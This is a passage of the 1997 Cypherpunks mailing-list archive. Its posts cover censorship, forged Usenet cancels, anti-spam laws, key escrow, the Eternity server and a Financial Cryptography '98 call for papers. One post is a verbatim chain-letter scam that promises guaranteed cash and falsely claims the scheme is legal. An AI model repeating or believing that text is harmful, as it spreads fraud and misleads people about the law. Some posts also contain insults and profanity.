almost instantaneously. This must be of great concern to control
freaks and those who steal money and other assets with force. It has
always been that way.

Howard Rheingold states in Democracy is About Communication:
(http://www.well.com/user/hlr/texts/democracy.html)

"The threat of uncontrollable communications among citizens, not the
pornographic pictures or taboo words that a tiny portion of the online
population publish, is why freedom of expression is under attack.
'Decency' is a smokescreen. It's about power." and "Communication is
Political": "Porno on the Net is a sideshow. The main event, taking
place far from the spotlight, is about who will control and profit
from the new industry that network communication technology makes
possible."

Clearly in Australia the bureaucrats at the ABA hope to be a key body
to write their own ticket in this, to them, brave new world. The utter
cluelessness of the government and the ABA can be seen in an earlier
report released in 1996 which is good reading for a laugh where the
ABA clearly has difficulty coming to terms with the difference between
BBS, which until recently was the bogey man the government focused
on, and the net. See: Report on the Investigation into the Content of
On-Line Services dated 30 June 1996 
(http://www.dca.gov.au/aba/olsrprt.htm).

On age limits:

"14.3 The Subscriber must be a legal person. Any minor seeking access
must do so as a User of a Subscriber's account.  Supervision of such a
User shall be the responsibility of a Parent or Guardian of the minor."

Of course if the parent in question was supervising the minor then the
proposed censorship laws about to go before parliament that will limit
the ability of Australian _adults_ to access information would not be
required (I liked a previous description of this concept in another
article which described it as an "infantocracy").

--
"You have the rights antecedent to all earthly governments; rights that
cannot be repealed or restrained by human laws; rights derived from the
Great Legislator of the Universe."
..John Adams, Second President of the United States.







From paul at fatmans.demon.co.uk  Mon Aug  4 11:13:30 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Tue, 5 Aug 1997 02:13:30 +0800
Subject: Humor: Extracts from the News of the Weird mail list
Message-ID: 




* In March, armed with evidence that a drug dealer had been killed
with a single gunshot during a robbery by two men, Torrance,
Calif., district attorney Todd D. Rubenstein obtained separate jury
convictions of both men for firing the fatal shot.  Both robbers' guns
had fired, but one missed, and a conclusion as to which one could
not be drawn from ballistics tests.  Rubenstein asserted confidently
to one jury that Stephen Edmond Davis, 19, shot the man, and just
as confidently to the other jury that it wasn't Davis, but rather John
Patrick Winkleman, 19.

* Former Prestonburg, Ky., school board member Wood R.
Keesee, 59, filed a lawsuit in May against a female court clerk to
whom he had allegedly loaned money in 1996.  Under the terms of
the $1,800 loan, according to Keesee, she was to have 18 sexual
encounters with him, but when she stopped after three, he filed the
lawsuit. 






From paul at fatmans.demon.co.uk  Mon Aug  4 11:15:21 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Tue, 5 Aug 1997 02:15:21 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: 




> > > Ok so if a mailing list gateway @bwalk.dm.com pumps thousands of broken
> > > posts into usenet you don't wish them to be removed from usenet?
> > 
> > That would be for Dimitri to decide for himself, and not for some 
> > cocksucker to take a unilateral decision on.
> 
> I have made no such unilateral decision,  I have simply asked a question
> of the good Doctor.

Quite so, maybe this was phrased in such a way as it looked insulting to 
you, it wasn`t intended to be so, merely a general swipe at cancel-forgers.

> > Of course disabling cancels on all news-servers would mean such a freak
> > article couldn`t be cancelled, even by it`s author, 
> 
> Wouldn't authentercated cancel models be better so an artical could be
> cancelled by its author and no other.

This would be a good idea, which I thought about when I posted the 
article, but it`s probably too much to expect all the news-admins of the 
major sites to keep up to date with their s/w and for the s/w authors to 
write in such functionality, just turning of cancels is easier. 

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"







From stewarts at ix.netcom.com  Mon Aug  4 11:39:37 1997
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Tue, 5 Aug 1997 02:39:37 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: 
Message-ID: <3.0.2.32.19970804093014.007720b4@popd.ix.netcom.com>



At 03:52 PM 8/3/97 +1000, Charles wrote:
>   ? the Platypus {aka David Formosa} said:
>>The best solution given so far is Cause's suggestion of modifying 
					[Cauce , by the way....]
>>the fax law so that we can sue the spammers.
>
>Thus giving gubmints the toe in the door they are so desperately looking 
>for to regulate/license/control the online world.
>
>The first thing you would see after passing such a law (if indeed the 
>original legislation itself didn't contain the provision) would be a 
>requirement for identification of all accounts and account holders. 
>Anonymous email and anonymous remailers would be the first victims.

Hear, hear!  The fax law says precisely that you can't send a fax
without correct identification of the sender, and an email equivalent
law would do the same.  (Anonymous remailers wouldn't necessarily be
banned, as long as they identified themselves correctly; if anything
this would probably encourage deployment of remailers, mainly by spammers,
which is a mixed blessing.)  Also, there are several Supreme Court cases,
such as McIntyre vs. Ohio, that strongly uphold the right to anonymous
publication; the fax law probably violates this, though I doubt it's been
taken to court.  The issue of the cost to the receipient of junk faxes
was the justification for the junk fax laws; I've heard that
Spamford himself was the junk faxer who they were a response to,
though I haven't seen any verification of that, and of course
widespread caller-id could have taken care of the problem without
requiring a Federal law.

One obvious implementation of identification would of course be a
Key Management Infrastructure...  They might not do it, not only because
it would require everyone to change their email programs, but more
seriously because it would require everyone to use encryption-capable
mailers (or at least signature-capable), and even with 40-bit escrowed
mail, it makes eavesdropping much more work.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Mon Aug  4 11:42:55 1997
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Tue, 5 Aug 1997 02:42:55 +0800
Subject: Denning backs away from GAK
In-Reply-To: <3.0.2.32.19970801185452.007746e8@popd.ix.netcom.com>
Message-ID: <3.0.2.32.19970804093718.00772074@popd.ix.netcom.com>



At 08:22 PM 8/1/97 -0700, Tim May wrote:
>I disagree. A likely scenaria, I fear, is this:
>* Denning's new study gets publicity
>* Denning is "redeemed" and gains new influence
>* GAK is delayed for this year
>* Denning continues her study
>* Next year's report finds solid evidence that crypto is being used to
>hinder investigations, and has indeed had an effect.
...
>* Denning's new conclusions, and her redemption, 
>will generate support for GAK.

Tim, being more cynical than I am, is probably correct :-)
But still, we should take advantage of it when we can;
never miss a chance to use government statistics in ways that
annoy their originators....

Denning's previous big-publicity study was the interim report on
Clipper security (saying Skipjack was apparently quite strong),
which achieved its propaganda goals; the final report, which was supposed
to address the whole Clipper system, including the on-chip parts
and the key escrow process in the NSA/Mykotronix vault, was never
released, which I consider to be a substantial piece of intellectual
dishonesty.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From paul at fatmans.demon.co.uk  Mon Aug  4 12:09:45 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Tue, 5 Aug 1997 03:09:45 +0800
Subject: Eternity Content Suggestions
In-Reply-To: <19970803231431.4542.qmail@zipcon.net>
Message-ID: 





> Favorite Cypherpunks Cryptographic Links, including helpful offshore
> source code archives, and a pointer to the Cyphernomicon.

Yes, actually posting some crypto code to the eternity archive would be a 
good way to export it, I know it`s big but how about the whole platform 
independent source to PGP v5.0 as a plaintext document.

Oh, and how about some $cientology "copyrighted" documents.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"







From nobody at REPLAY.COM  Mon Aug  4 14:27:57 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 5 Aug 1997 05:27:57 +0800
Subject: Ponzi Schemes (was Re: non-censorous spam control)
Message-ID: <199708042057.WAA23756@basement.replay.com>



Vulis wrote:

>A similar scheme in Russia by an organizaton called "MMM", run 
>by the Mavrodi bothers, left a large number of "investors"
>holding the bag. Interestingly, one of the Mavrodi brothers
>is now in Russian jail (awaiting trial), and the other one is
>still running a pyramid scheme: he accepts "voluntary donations"
>from an investor, in return for a "voluntary donation" at a later
>date whose amount and time are not guaranteed and depend on
>the "donations" collected from others. The Russian government
>does not shut down Mavrodi's latest operation so far, claiming
>it's not "fraud" since he doesn't misrepresent the source of
>his returns nor the risks involved. Reportedly so far he's
>getting oodles of investors and pretty good returns. Eventually
>of course his scheme will collapse, but the "investors" who
>got in and out early enough will have made good money.

Can you say "Wall Street?"  Because that's exactly how it operates right 
now.  The money being thrown at the stock market today is not "investing," 
it's simply a pyramid scheme.

>A similar scheme recently brought down the government of Albania.
>Reportedly the investors who got in late in the game and didn't
>get the returns they expected (or actually lost their investments)
>demanded that the gubmint reimburse them for their losses (by
>taxing the money from the more intelligent Albanians). When
>the idiots want the gubmint to protect them from their own
>idiocy, the gubmint happily uses this excuse to screw not only
>those who would fleece the idiots, but everyone.

This is what happened when the US Savings & Loans Banks in the Southwest 
failed in the 80's.  All of the people who lost money were bailed out by 
the FDIC, which of course is funded by taxpayer money.  The final figure 
was approximately $500 billion, depending on whose estimates you believe.  
So the idiots who didn't do their homework and put money into a bogus S&L 
were bailed out by everyone else who was smart enough to know better.  And, 
of course, the fraudsters (one of whom was the son of then Vice-President 
George Bush) got away with a slap on the wrist.

Go figure.

MoneyMonger








From apache at bear.apana.org.au  Mon Aug  4 14:38:28 1997
From: apache at bear.apana.org.au (Charles)
Date: Tue, 5 Aug 1997 05:38:28 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <3.0.2.32.19970804093014.007720b4@popd.ix.netcom.com>
Message-ID: <199708042105.HAA14375@bear.apana.org.au>



-----BEGIN PGP SIGNED MESSAGE-----


    stewarts at ix.netcom.com said:

>which is a mixed blessing.)  Also, there are several Supreme Court cases,
>such as McIntyre vs. Ohio, that strongly uphold the right to anonymous

I envy the constitutional protections you have. We have no such 
protections and courts have found no right of free speech exists in 
Australia (ie if the High Court was correct of course). I'm assuming 
McIntyres case was a constitutional challenge.

>One obvious implementation of identification would of course be a
>Key Management Infrastructure...  They might not do it, not only because
>it would require everyone to change their email programs, but more
>seriously because it would require everyone to use encryption-capable
>mailers (or at least signature-capable), and even with 40-bit escrowed
>mail, it makes eavesdropping much more work.

Also if that did come to pass the casual user would become much more 
interested in crypto and probably ask why his crypto-enabled mailer was 
dum-ed down. Hmmmm...interesting.

Somehow I think the gubmint would be very wary of such a possibility; but 
who knows.

Comment for the list copy of this mail:
(Just on the matter of mailers, for anyone running X take a look at
exmh if you haven't already. This gives a nice graphical interface
and pgp is integrated into it making reading/writing encrypted mail
as simple as clicking a button. Combine it with xemacs and you have a
very powerful email system. Pegasus for Win95, and I think Win3.1 is
a freeware mailer for which a freeware add-on for pgp integration is
available)

 -- 
   .////.   .//    Charles Senescall             apache at bear.apana.org.au
 o:::::::::///     PGP mail preferred            apache at quux.apana.org.au
>::::::::::\\\     Finger me @bear for PGP PUBKEY      Brisbane AUSTRALIA
   '\\\\\'   \\    Apache





-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBM+ZEHXawhvoxf0r9AQFWdggAvOUckh2TNEqcFL5/higpXGR5+vbjItmV
MhB/5XsFCur9Jkls9KtWwQhn0bTdVqfVrj0LENw8W+xmPvEqaFFFtoGASA94+qjb
4tO5zuZR140E7e6g09IRsiNNJDTVvyB8hXPIIfFlcvQvvJ+6EZKCrZqI5gkQLXMb
leaOmdb7kvtsDC6DO6MTz2LS6YgN/J3ktj4VcuvN93HDEO4PiCVKWHEOfVKTpGpi
enSzWAjQzZQ9+0KVcx/w4+CGByDvs9GGHMsfOx626yCiv5wcubw1eM6sOhkfuk9M
9Nk+Bo2KuEP9dovJxFitimm58IphtEPhvEIBOWq0loR+USwwhiC6Og==
=QlpY
-----END PGP SIGNATURE-----






From freegift at S&Bmail.com  Tue Aug  5 06:43:09 1997
From: freegift at S&Bmail.com (freegift at S&Bmail.com)
Date: Tue, 5 Aug 1997 06:43:09 -0700 (PDT)
Subject: FREE GIFT!
Message-ID: <199473170025.GAA08056@S&Bmail.com>



$$$ NEED MONEY RIGHT NOW? $$$

HONEST "PEOPLE HELPING PEOPLE" OPPORTUNITY
100 TIMES MORE EFFECTIVE THAN MLM

You WILL have $7,000 in 2 weeks Guaranteed!
Only A $10 is the total Cost!!!AND 1 HOUR of work!

PLEASE READ TO FIND OUT HOW!

THIS is the fastest, easiest program you will ever be able to do.  Complete it in One hourand you will never forget ther day you first received it.  If you are doing other programs, by all means stay with them.  The more the merrier!  But use this program FAST CASH!

Please Read On!

There are only THREE LEVELS.  This three-level program is more realistic and much, much faster.  Because it is so easy, the response rate is VERY HIGH and VERY FAST, and you will receive your rewards in about FOURTEEN DAYS.  Thats only TWO WEEKS- not three months.  Buy the toys you have been dreaming of!

Cindy Allen tells how she ran this gift summation four times last year.  The first time, she received $3,000 in cash in two weeks and then $7,000 in cash the next three times.  When this letter is continued as it should be, EVERYONE PROFITS!!  Don't be afraid to make gifts to strangers, they'll come back to you ten fold.  Many of us have pet programs that we want to support: food, medicine, children, or Maybe you just need a new car or want to pay off some bills.  THIS WILL DO IT FOR YOU!!

HERE ARE THE SIMPLE DETAILS

You email as many as possible, GETTING JUST 20 TO PARTICIPATE.  You should send them to PEOPLE WHO SEND YOU THEIR PROGRAMS, because they are already believers and your program is FASTER AND BETTER!  This takes a very small investment so TRY IT!

JUST GIVE TWO PEOPLE A $5 BILL. Thats it, Thats all!  Follow these simple instructions and in two weeks you will have at least $7,000 because many people WILL respond due to the LOW INVESTMENT, SPEED of RETURN and HIGH PROFIT POTENTIAL! So let's help keep it going, and help each other!!!

1.On a blank sheet of paper, write your email address, name, and address clearly, write "put me on your mailing list" and fold it around a FIVE DOLLAR BILL.  Send it to the FIRST AND LAST NAMES on the list.  ONLY THE FIRST AND LAST PERSON ON THE LIST GETS YOUR NAME AND A FIVE DOLLAR GIFT.  Only after sending to the First and LAST NAMES can you go to STEP 2.

2.DELETE NAME #3 ON THE LIST , MOVE ORIGINAL NAME #1 DOWN TO #2 AND #2 TO #3, THEN ADD YOUR NAME AND ADDRESS TO SPOT #1

3.Copy & Save the letter, then email AS MANY copies of this letter as possible.  An excellent source of names is the people who send you other programs, and the names listed on the letters that they send you.  Do it right away.  It's so easy! Don't mull it over.  ONE HOUR! THATS IT!

There is no mailing list to wait for or buy.  You can do it again and again with your regular group of gifters. WHY NOT?  It pays to help others!  Your name and address is used twice in the 3 name list mailing. 20x20x20=8000x$5x18%reply rate= $7000

C'mon! The prospect of an easy $7,000 to $10,000 in TWO WEEKS is worth a little experimentation and only One hour of your time and TWO $5 bills(cash)

Legality Issue?
According to title 18, Section 1302 &1342 of the US Postal and Lotery laws, any mailings that provides a service is 100% legal.

Summary:
Thsi legal mailing makes you money on this list, and also places you on other peoples mailing list as a legal service to you.  When you send your $5 cash and name and address, your name and address will be placed and then sent out many, many times on other peoples money making mailing campaigns.
Thus, providing you with an endless rapid flow of income in return!  All that for TWO $5 bills and 1 HOUR of your time.

ACT FAST AND GET MONEY FAST!
HONESTY AND INTEGRITY MAKE THIS PLAN WORK.  COPY THE NAMES CAREFULLY AND SEND FIVE DOLLARS CASH TO THE FIRST AND LAST NAME ON THE LIST
PEOPLE HELPING OTHER PEOPLE!

IF YOU EVER BET ON ANYTHING IN YOUR LIFE, BET ON THIS, YOU'RE A WINNER!!!!!!!!!

1.SAB Strategies
   5635 S. Lewiston Ct.
   Aurora, CO
   80015

2.L'S LIBRARY
   P.O. BOX 24002
   F.T. LAUDERDALE, FL.
   33307

3.P Romaine
   622 Warfield Rd.
   No PLainfield, NJ
   07063
   








From rah at shipwright.com  Tue Aug  5 07:30:26 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 5 Aug 1997 07:30:26 -0700 (PDT)
Subject: Financial Cryptography '98 Call for Papers
Message-ID: 



--- begin forwarded text


Resent-Date: Mon, 4 Aug 1997 18:40:01 -0400
X-Authentication-Warning: online.offshore.com.ai: list set sender to
fc97-request at offshore.com.ai using -f
Date: Tue, 5 Aug 1997 00:06:32 +0200 (MET DST)
From: Ray Hirschfeld 
To: ray at cwi.nl
Subject: Financial Cryptography '98 Call for Papers
Resent-From: fc97 at offshore.com.ai
X-Mailing-List:  archive/latest/65
X-Loop: fc97 at offshore.com.ai
Precedence: list
Resent-Sender: fc97-request at offshore.com.ai

		      Financial Cryptography '98
		   Second International Conference
		 February 23-26, 1998, Anguilla, BWI
			   CALL FOR PAPERS


General Information:

Financial Cryptography '98 (FC98) is a conference on the security of
digital financial transactions.  Meetings alternate between the island
of Anguilla in the British West Indies and other locations.  This
second meeting will be held in Anguilla on February 23-26, 1998.  FC98
aims to bring together persons involved in both the financial and data
security fields to foster cooperation and exchange of ideas.

Original papers are solicited on all aspects of financial data
security and digital commerce in general, including

    Anonymous Payments                      Fungibility
    Authentication                          Home Banking
    Communication Security                  Identification
    Conditional Access                      Implementations
    Copyright Protection                    Loss Tolerance
    Credit/Debit Cards                      Loyalty Mechanisms
    Currency Exchange                       Legal Aspects
    Digital Cash                            Micropayments
    Digital Receipts                        Network Payments
    Digital Signatures                      Privacy Issues
    Economic Implications                   Regulatory Issues
    Electronic Funds Transfer               Smart Cards
    Electronic Purses                       Standards
    Electronic Voting                       Tamper Resistance
    Electronic Wallets                      Transferability


Instructions for Authors:

Send a cover letter and 12 copies of an extended abstract to be
received by November 17, 1997 (or postmarked by November 7, 1997 and
sent via airmail) to the Program Chair at the address given below.

The extended abstract should start with the title, the names of the
authors, and an abstract followed by a succinct statement appropriate
for a non-specialist reader specifying the subject addressed, its
background, the main achievements, and their significance to financial
data security.  Submissions are limited to 15 single-spaced pages of
12pt type.  Notification of acceptance or rejection will be sent to
authors no later than January 12, 1998.

Authors of accepted papers must guarantee that their paper will
be presented at the conference.


Proceedings:

Proceedings of the conference will be published by Springer Verlag in
their Lecture Notes in Computer Science (LNCS) series.  Preproceedings
will be available at the conference, but final versions will not be
due until afterwards, giving authors the opportunity to revise their
papers based on presentations and discussions at the meeting.
Instructions and deadlines for submission of final papers will be sent
later to authors of accepted papers.


Rump Session:

In addition to the regular conference program, a rump session will be
held to provide an opportunity for less formal presentations.
Although the rump session will be organized during the conference
itself, any advance proposals may be sent to the Program Co-Chair at
the email address given below.  Rump session contributions will not
appear in the conference proceedings.


Stipends:

A very limited number of stipends may be available to those unable to
obtain funding to attend the conference.  Students whose papers are
accepted and who will present the paper themselves are encouraged to
apply if such assistance is needed.  Requests for stipends should be
addressed to one of the General Chairs.


Registration:

Information about conference registration and on travel, hotels, and
Anguilla itself will follow in a separate general announcement.  There
will be special discount registration rates for authors of accepted
submissions, full-time academics, and students.


Workshop:

A workshop, intended for anyone with commercial software development
experience who wants hands-on familiarity with the issues and
technology of financial cryptography, is planned in conjunction with
FC98, to be held during the week preceding the conference.  For
information, please contact one of the General Chairs.


Send Submissions to:

Rafael Hirschfeld
FC98 Program Chair
CWI
Kruislaan 413
1098 SJ Amsterdam
The Netherlands
email: ray at cwi.nl
phone: +31 20 592 4169
fax: +31 20 592 4199


Send Rump Session Contributions to:

Matthew Franklin
FC98 Program Co-Chair
email: franklin at research.att.com


Program Committee:

Matt Blaze, AT&T Laboratories--Research, Florham Park, NJ, USA
Antoon Bosselaers, Katholieke Universiteit Leuven, Leuven, Belgium
Yves Carlier, Bank for International Settlements, Basel, Switzerland
Walter Effross, Washington College of Law, American U., Washington DC, USA
Matthew Franklin, AT&T Laboratories--Research, Florham Park, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Rafael Hirschfeld, CWI, Amsterdam, The Netherlands
Alain Mayer, Bell Laboratories/Lucent Technologies, Murray Hill, NJ, USA
Moni Naor, Weizmann Institute of Science, Rehovot, Israel
Frank Trotter, Mark Twain Ecash/Mercantile Bank, St. Louis, MO, USA
Doug Tygar, Carnegie Mellon University, Pittsburgh, PA, USA
Moti Yung, CertCo LLC (formerly: Bankers Trust E-Commerce), New York, NY, USA


General Chairs:

Robert Hettinga, Shipwright, Boston, MA, USA
   email: rah at shipwright.com
Vincent Cate, Offshore Information Services, Anguilla, BWI
   email: vince at offshore.com.ai


Exhibits and Sponsorship Manager:

Julie Rackliffe, Boston, MA, USA
   email: rackliffe at tcm.org


Workshop Leader:

Ian Goldberg, Berkeley, CA, USA
   email: iang at cs.berkeley.edu


Those interested in becoming a sponsor of FC98 or in purchasing
exhibit space, please contact the Exhibits and Sponsorship Manager.

A copy of this call for papers as well as other information about the
conference will be available at URL http://www.cwi.nl/conferences/FC98.

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From dlv at bwalk.dm.com  Mon Aug  4 16:30:32 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Aug 1997 07:30:32 +0800
Subject: Eternity Content Suggestions
In-Reply-To: 
Message-ID: 



Paul Bradley  writes:
> > Favorite Cypherpunks Cryptographic Links, including helpful offshore
> > source code archives, and a pointer to the Cyphernomicon.
> 
> Yes, actually posting some crypto code to the eternity archive would be a 
> good way to export it, I know it`s big but how about the whole platform 
> independent source to PGP v5.0 as a plaintext document.
> 
> Oh, and how about some $cientology "copyrighted" documents.

I said back when theprototype Eternity server was announced that this was
a very important development; I'm glad that it's moving forward.

I'd like to nominate another candidate for the eternity server.

As some folks on this list may be aware, the Spanish government has been
trying to censor the basque nationalist web site with a limited degree of
success.

A week or so ago the basques exploded a bomb killing one person. The
Spanish gubmint publicly demanded that CNN remove the link from its
Web site to the Basque site, calling them terrorists. The CNN declined
and this victory for free speech was touted al over the Internet.

What didn't seem to get much coverage is the fact that the basque site
was hosted by the Institute for Global Communications.  I remember ICG
from the days I was helping bring the Internet to Eastern Europe. They're
well-meaning folks, but very cowardly and not too technically sophisticted.
The Spanish government organized a mailbombing campaign against them, 
similar to the campaigns against the "spammers". (It sounded to me like
both mailbombs and ping storms were involved, all coming from numerous
sites in .es.) Last week ICG bent over and announced that they're
pulling the plug on the Basque site.

This act of government-sponsored net.terrorism and content censorship must
not go unpunished, but the first step is to ensure that the Basque site
is up and running. I sugggest putting it on the Eternity server, and
mirroring it on any other servers that are willing to put up with the
blackmail and denial-of-service attacks from the net.terrorists organized
by the Spanish government.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Mon Aug  4 16:34:48 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Aug 1997 07:34:48 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: <199708011508.KAA04749@raid2.fddi.phoenix.net>
Message-ID: 



wireinfo  writes:

> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >On Thu, 31 Jul 1997, Dr.Dimitri Vulis KOTM wrote:
> >
> >> ? the Platypus {aka David Formosa}  writes:
> >> 
> >> > Nno one is arugeing that.  Both sides in this debait aggry that that is 
> >> > REAL BAD thing.  Spam cancelers use an objective rules.
> >
> >[...]
> 
> You're not very bright are you David?

In my humble opinion David is pretty bright.  Unfortunately he's misguided
about certain things.  I think the extreme aversion to censorship (like that
displayed by imp and myself) seldom arises in people who haven't themselves
been victims of censorship (plug-pulling or forged cancels, not 'censored thro
being drowned up by the dissenting opinions" "-)

> 
> 
> >> Let me clarify two things:
> >> 
> >> 1. "Spam cancellers" are not generally news admins.
> >
> >I think you will have to justerfy this,  the top spam cancellers are all
> >news adimns.
> 
> Aer nto.

The current top "spam canceller", Rich Bland ("cosmo") is an admin of a tiny
little BBS in California - probably fewer users than mine. The previous top
"spam canceller" - Rick Buchanan - was just a user, whose actions were condonded
by the admins of the several systems he used to forge cancels. (He only had
his plug pulled by one ISp I know of.)

Most of the people who scream about their "hatred of spam" on news.* are not
admins, but fairly recent users who figure that "fighting spam" is a cool thing.

Thing is hardly relevant - anyone can easily set up their own site and become
its admins.  I was just pointing out that it's factually incorrect to use
"admins" as a synonym for "anti-spammers".  Many admins are pro-free speech.
> 
> >> 2. Once a cancel-forger builds a "reputation" as a "spam canceller",
> >> s/he often diversifies into "retromodetration"
> >
> >There is little proof that this is the case.  Even the netscum case could
> >have been considered spam.
> 
> What the fuck is "the netscum case"?

I think David is referring to the recent case of content-based cancels forged
by Chris Lewis for severa articles whose only thing in common was the mention
of Chris lewis's Net.Scum page.  

This is just one of dozens of such examples.  Chris Lewis and Dave Barr obth
forge cancels for usenet articles that follow up on their articles and quote
them, claiming "copyright violations".  Interestingly, Dave Barr is one of the
moderators of news.admin.net-abuse.announce.  When that newsgroup was up for
a vote, its charter said (don't know why) that its moderators aren't supposed
to issue third party cancels.  So much for moderated newsgrou charters. :-)

> 
> >
> >[...]
> >
> >> > Not even forgeries in my name?  Not even out of the control spews from
> >> > fidonet?
> >> 
> >> Correct.
> >
> >Ok so if a mailing list gateway @bwalk.dm.com pumps thousands of broken
> >posts into usenet you don't wish them to be removed from usenet?
> 
> The motherfucker can remove them himself, send him a note. But after 
> they've already hit our servers and we've already read them it doesn't 
> make much of a difference now does it? We've got to receive repeated 
> blasts of forged cancels ten times the number of the offending posts?

Once the offending articles are part of the spool on toher site, it's pointless
for me to issue cancels. Note that both have happened: both I and my wife have
been forged numerous times on usenet, and there have been spews from this site.
I don't think that trying to remove them from spool is a proper thing to do
whether or not my site ogirinated them.  I do think it's polite to try to
let people know that these articles are forged/obsolete/posted in error and
should be ignored.  That was the original purpose of the cancel control
articles in RFC 1036 - I post a "car for sale" ad, I sell the car, I don't
want to get any more replies, I cancel it. Problem is, the cancels in RFC
1036 were unauthenticated - relied on honor, and too many people on Usenet
have no honor are aere eager to forge other people's e-mail addresses on
their cancels.

As I discussed with David in private mail, a "retraction server" that would
announce forgeries, spews, etc would be a useful thing.
> 
> You're really not very bright are you David?

Just misguided.  
> 
> >Nor if I post a message with your name and email, saying "Chris Lewis the
> >best thing that happened to usenet and I wish to have his baby."
> 
> A simple "I didn't write that" shall suffice.

I recall how a couple of years ago Peter Vorobiev forged a bunch of articles
in my name all over Usenet, and I posted an announcement to that effect
on news.admin.net-abuse.misc, and got some very obnoxious e-mail from Tim
Skirvin saying it's off-topic.


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Mon Aug  4 16:35:47 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Aug 1997 07:35:47 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free
In-Reply-To: <3.0.2.32.19970731102244.006f3430@popd.ix.netcom.com>
Message-ID: <5wHXae8w165w@bwalk.dm.com>



Bill Stewart  writes:

> At 10:36 PM 7/30/97 -0400, Ryan Anderson wrote:
> >"Make Money Fast" are killed because they're illegal scams in the US and I 
> >think in most of the world.

This doesn't give the various net.scum any right to forge cancels for them.
(I used to forge cancels for MMFs years ago - I was very wrong.)

But this is not the only kind of content censorship going on under the guise
of 'spam cancels".  Check out the Net.Scum Web site.  One guy decided to cancel
an entire thread discussing the requirements for setting up a MUD server
claiming it was "spam".  Another forged a cancel for a national Science
Foundation announcement in sci.fractals figuring it was off-topic, therefore
"spam".  It takes a special kind of asshole to take up "spam-cancelling"
and most of them don't stop at cancelling just the "multi-posted" articles -
they quickly diversify into foring purely content-based cancels.

> 
> They're illegal in the US primarily because the Post Office is confused
> about whether its job is to deliver the mail or to censor it,
> and delivery of MMFs by mail is policed by Postal Inspectors just as
> delivery of obscenity by mail is.  It's a side effect of having services
> provided by a government monopoly rather than the free market,
> though I'm sure that to some extent it's because people started 
> complaining to the Post Office that they were receiving junk mail,
> and complaining to their legislators that they lost money on these scams.
> 
> On the Internet, on the other hand, not only is the stuff spam and a scam,
> but it's abusing flat-rate prices for service, and service providers
> don't like it.  Julf's remailer used to block MMFs.

MMFs are one example of a "memetic" article which encourages the readers to
reproduce it and post it elsewhere.  Does anyone remember the Craig Shergold
meme?  When I worked at GS, I came across a paper copy of it - a bunch of
p.r. and salespople were faxing it to one another and asking for business
cards to be sent to it.  The idiot sysadmins at a school I taight at put
the craig Shergold appeal in the message-od-the-day on the school computer.
> 
> Pyramid scams like the MMF, and the government's inability to deal with it,
> brought down the Albanian government recently.  Here in the US that would
> _never_ happen (:-), assuming of course you don't consider Social Security
> to be a Ponzi scheme....

This reminds me of the old farts who lost lots of money in the mini-crash in
Oct 87.  Basically, they sold insurance to other investors against the maret
suddenly going down a lot (which is a low-probability event, but can happpen and
I think will happen again any day now :-)  They were collecting their equivalent
of insurance premiums. When the market did hucckup and they had to pay what
they promised they would, they started screaming that they weren't warned
adequately that their income wasn't "risk-free" and they might actually have
to perform their part of the contract they entered!

Why should the gubmint protect people from pyramid schemes and other such scams?
("make money at home stuffing envelopes" seems to be a related scam that's
very popular and not "illegal".)  Any time a sucker tries to beat the market,a
xtto get more than the normal return without incurring extra risk, he
deserves to be fucked.  Gubmint's attempts to "protect" the sucker limit
the freedom not of the crooks who'd fleece him (they'll find a way), but
the regular people who are neither crooks not suckers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Mon Aug  4 16:35:56 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
